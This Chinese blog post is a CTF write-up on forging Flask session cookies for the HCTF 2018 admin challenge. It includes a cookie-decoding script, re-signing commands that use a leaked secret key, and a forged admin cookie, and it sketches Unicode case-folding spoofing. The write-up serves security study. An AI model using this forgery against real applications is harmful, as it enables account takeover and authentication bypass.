flask session伪造之hctf admin

已于 2022-07-04 22:09:33 修改
阅读量509 收藏 2
点赞数
分类专栏: CTF知识点 文章标签: flask python 后端
于 2022-07-04 21:58:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/125609059
版权

知识点:

flask的session是存储在客户端cookie中的,而且flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的。还有些session是存储在数据库中或者服务器的文件里。

关于只有admin才能读取flag 的题目,我们可以通过伪造session来达到身份伪造;

步骤如下:

得有伪造代码:下载地址:https://github.com/noraj/flask-session-cookie-manager

1.首先得到网站的session值,F12 cookie里面获得,然后将session进行解密:解密脚本网上一大堆;这里我的是:

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

代码可以放在从https://github.com/noraj/flask-session-cookie-manager 下载来的session伪造加密代码文件里面配合cmd使用

使用方法:python session解密.py session值

例如 :

>python session解密.py eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.XyZ3Vw.OcD3-l1yOcq8vlg8g4Ww3FxrhVs

结果:

 2.将解密得到的session进行伪造,伪造需要密钥,所以我们需要找到它的密钥才可以伪造:一般是伪造admin,就把其中的用户名改为admin

使用方法:该flask伪造有加密和解密,这里一般用到的是encode ,

语句: python flask_session_cookie_manager3.py encode -s "密钥" -t "session解密结果(把用户名更改后的)"

例如

python flask_session_cookie_manager3.py encode -s "woshicaiji" -t "{'username': b'admin'}"

3.将伪造后的session重新输入cookie;

HCTF admin 为例:

首先我们随便注册一个账号密码,在改密码界面的源码中可以得到提示,有用的源码在提示中;

这道题看到的源码需要从给的提示中找到,具体过程参考其他wp,反正得到下载的路径之后首先看路由route 虽然这道题里面没有东西;

参考:BUUCTF [HCTF 2018]admin 1_wow小华的博客-CSDN博客

1.session 复制下来:解密session;

python session解密.py .eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAgnACI7ieq-71NQjG8PwFEfNsnQ.YsLkGA.-IhgD3h5Rju-WwMa4YbLJO69j6I

得到:

{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': '123', 'user_id': '10'}

将其中的name值123 改为admin 之后 伪造;

这里的密钥在config.py 中;

2.直接伪造:

python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"

python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"

 结果:

.eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAtqWrTzCC67nqXn-DYAzPX_3EbhA.YsLnVA.f91nHdCGekSIwqWqz9T9cba5tkA

3.将上面结果重新输入cookie中的session ,刷新;就可看到flag;

这道题通过代码审计,也可以看到一个函数的漏洞:

Unicode欺骗

strlower()导致的欺骗,参考

HCTFadmin--关于flasksession的伪造和unicode的欺骗_Z3eyOnd的博客-CSDN博客

就是说通过查询Unicode的特殊编码,比如说A的是ᴬ ,如果我们注册ᴬdmin ,函数就会把ᴬ 解析为A;再改密码或者登录就会把A解析为a;从而达到目的;

还有一种就是条件竞争;参考上链接;

一只Traveler
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flask-session-cookie-manager
01-29
使用python脚本更改或生成cookie
flask-session-cookie-managerFlask会话Cookie解码器
02-05
Flask Session Cookie解码器/编码器 原作者: 修复和改进作者: 从导入 依赖 Python 2或Python 3 安装 包 BlackArch Linux # pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn python2: $ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager # makepkg -sic 其他
Flask中的sessioncookie
python_class的博客
09-03 241
会话控制 cookie 说明: 因为HTTP协议无状态无连接的特点,导致一个用户在同一网站做连续操作,需要不断的提供身份信息;为了解决这个问题,我们可以通过cookie携带特定的信息加以解决。当首次访问网站时设置cookie信息,以后每次再访问该网站时,浏览器会自动携带cookie信息。 使用: from flask import Blueprint, request, make_res...
Flask-Session-Cookie-Manager: 简化Flask应用中的会话与Cookie管理
最新发布
gitblog_00015的博客
04-16 352
Flask-Session-Cookie-Manager: 简化Flask应用中的会话与Cookie管理 项目地址:https://gitcode.com/noraj/flask-session-cookie-manager Flask-Session-Cookie-Manager 是一个基于Python Flask框架的扩展库,它为开发者提供了一种简单、直观的方式来管理和操作应用中的会话和Coo...
[CTFShow] 记一次Flask session伪造
YV_LING的博客
11-13 1647
双十一的时候,ctfshow搞了一个“菜狗杯”比赛,其中有道题印象比较深刻,在此记录一下。
[CISCN2019 华东南赛区]Web4 FLASKsession伪造
qq_54929891的博客
05-24 537
进入网站后点击read something看见一个疑似远程文件泄露 尝试了一下伪协议filter没有反应,file被禁用了 到这里我就卡住了,我想不到还有什么可以远程读取文件的了 学习得知大佬们一看这个路由就不像是php的,于是盲猜是pythonFLASK框架,利用load_file来读取源文件(我查不到这个读取的来源,不理解为啥是这个) 可以打开etc/passwd,从最后一行可以看到最后一个用户执行了/app目录下的一个/bin/ash命令,也就意味着我们当前在/app目录的上..
Flask-session用法
qq_53142368的博客
06-07 1603
首先还是先从概念入手,最近学习越学越来越觉得自己菜 Flask-session: 概念: session咱们都知道是基于cookjie实现的,保存在服务器的键值对,同时在浏览器的cookie中也会保存相同的随机字符串,用来再次请求时拿出来,进行验证。 注意:Flask中的session是保存在浏览器中的,默认的key是session(加密的cookie),当然也可以将其保存在数据库中 flask中有一个session对象,它允许你在不同请求间存储特定用户的信息。它是在cookie的基础上实现的,并且对c
flask session伪造admin身份
since_2020的博客
08-09 3775
flask session 伪造 准备工作 需要先找是否有SECRET_KEY python脚本可以把flasksession解密出来,但是如果想要加密伪造生成自己的session的话,还需要知道flask用来签名的SECRET_KEY 假设当前的SECRET_KEY是 ckj123 安装缺少的module 注意: 第一次弄的时候没有很多module,会报这样类似的错 ImportError: No module named ‘itsdangerous’ 直接安装对应module pip ins
flask session伪造
shao65308的专栏
11-10 112
修改为:{'is_admin': True, 'name': 'admin', 'user_id': 1}生成所有可能的secre_key文件。爆破是用了哪个secre_key。把生成的字符串替换Cookie值。
FlaskCookieSession用法详解
IT之一小佬的博客
08-09 964
FlaskCookieSession用法详解
flask
aetlypdlg_ys的博客
04-09 353
在函数中,通过request.args获取请求的参数,然后使用eval参数求值,将字符串转化为Python表达式执行,并作为响应结果返回。函数是一个可以通过执行命令并打开管道来与其进行通信的功能强大的工具。这段代码使用了Flask框架的装饰器@app.route来定义一个HTTP路由,指定当访问网站的/hello/路径时,会调用名为hello_world的函数来响应请求。在hello下传eval参数,执行任意代码,调用os.popen函数读取了根目录下文件名以“f”起始的文件的内容,并将结果返回。
php_users_admin_session.rar_admin session_php 用户管理
09-24
上面是用PHP写的多用户管理的代码,MYSQL数据库也有的,里面有SQL文件
asp之让Session永不过期
01-02
又有人说设session.timeout=99999。这种同样不行,session有最大时间限制。我经过测试发现最大值为24小时,也就是说你最大可以session.timeout=1440,1441都是不可以有,呵呵。本人测试环境:win2003+IIS6.0+ASP3.0...
CodeIgniter配置之SESSION用法实例分析
10-22
主要介绍了CodeIgniter配置之SESSION用法,结合实例形式分析了PHP中session的运行原理并演示了CI框架下session的配置与使用方法,需要的朋友可以参考下
Express框架之connect-flash详解
12-23
var flash = require('connect-flash'); app.use(flash());//Express使用这个插件 第二步:我们看看其内部是如何实现的 var format = require('util').format; var isArray = require('util').isArray; 依赖的...
Flasksession伪造(从某平台学习Session身份伪造)
热门推荐
Y4tacker的博客
08-02 1万+
文章目录工具介绍FLASK解密FLASK加密脚本 工具介绍 FLASK解密 不推荐网上那个,反而这个倒是挺好用 #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payl
技术分享 跨越语言的艺术:Flask Session 伪造
m0_46699477的博客
10-18 205
在白帽汇安全研究院,漏洞检测和利用是一项创造性的工作,我们致力于以最简洁,高效的方式来实现。为了在 Goby 中实现 Flask Session 生成和利用方法,我们花费大量精力去调试 Flask 源码,分析 Session 的构造过程。最终,我们成功在 Go 语言中实现了 Flask Session 校验和生成方法。
flask session_FSCDE:一款Flask会话Cookie编码&解码工具
weixin_39638014的博客
11-30 552
FSCDE是一款功能强大的Flask会话Cookie编码&解码工具,广大研究人员可以在FSCDE的帮助下,对Flask会话Cookie进行编码或者解码。工具依赖1、Python2或Python3环境;2、itsdangerous3、Flask工具安装广大研究人员可以使用下列命令将项目源码克隆至本地:git clone https://github.com/noraj/flask-sessi...
postman伪造session
09-12
在使用Postman进行接口测试时,可以通过在Headers中添加Cookie伪造Session。具体步骤如下: 1. 打开接口文档,找到要测试的接口,并查看是否需要登录和身份验证。 2. 如果需要登录和身份验证,在Headers中配置请求头信息。其中,Cookie是验证身份的重要依据,需要将Cookie信息填入Headers中。 3. 将Cookie信息填入Headers tab下,如有其他Header参数信息,也需要填入。 4. 点击发送(Send)按钮,观察响应是否符合预期。 通过以上步骤,你可以在Postman中伪造Session来进行接口测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值